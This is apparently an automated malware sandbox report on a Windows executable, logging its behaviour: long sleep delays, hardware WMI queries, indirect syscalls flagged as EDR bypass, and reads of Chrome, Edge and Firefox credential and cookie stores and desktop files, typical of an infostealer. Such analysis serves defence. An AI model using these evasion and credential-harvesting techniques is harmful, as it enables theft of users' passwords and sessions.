              Source: cOQD62FceM.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: cOQD62FceM.exeStatic file information: File size 5484544 > 1048576
              Source: cOQD62FceM.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3ba600
              Source: cOQD62FceM.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x15d000
              Source: cOQD62FceM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: Glmp.pdb~ source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: lmp.pdb source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\* source: cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*60\* source: cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: cOQD62FceM.exeStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\cOQD62FceM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2734Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3318Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exe TID: 1352Thread sleep time: -35000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6588Thread sleep count: 2734 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6588Thread sleep count: 3318 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1576Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
              Source: C:\Users\user\Desktop\cOQD62FceM.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\user\Desktop\cOQD62FceM.exeThread delayed: delay time: 35000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior
              Source: Web Data.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Web Data.0.drBinary or memory string: discord.comVMware20,11696428655f
              Source: Web Data.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: Web Data.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: Web Data.0.drBinary or memory string: global block list test formVMware20,11696428655
              Source: Web Data.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Web Data.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: Web Data.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: Web Data.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Web Data.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: Web Data.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Web Data.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Web Data.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: Web Data.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: Web Data.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Web Data.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: Web Data.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: Web Data.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: Web Data.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Web Data.0.drBinary or memory string: AMC password management pageVMware20,11696428655
              Source: Web Data.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: Web Data.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Web Data.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: Web Data.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: Web Data.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: Web Data.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Web Data.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Web Data.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Web Data.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: Web Data.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: Web Data.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\Desktop\cOQD62FceM.exeNtReadFile: Indirect: 0x7FF7478B52C7Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeNtWriteFile: Indirect: 0x7FF7478ADB77Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\CEF\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\cOQD62FceM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\EWZCVGNOWT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\EWZCVGNOWT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\GLTYDMDUST.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\GLTYDMDUST.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\HMPPSXQPQV.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\KLIZUSIQEN.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\KLIZUSIQEN.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\KLIZUSIQEN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\KLIZUSIQEN.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\KLIZUSIQEN.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\NWCXBPIUYI.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\NYMMPCEIMA.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.png VolumeInformationJump to behavior
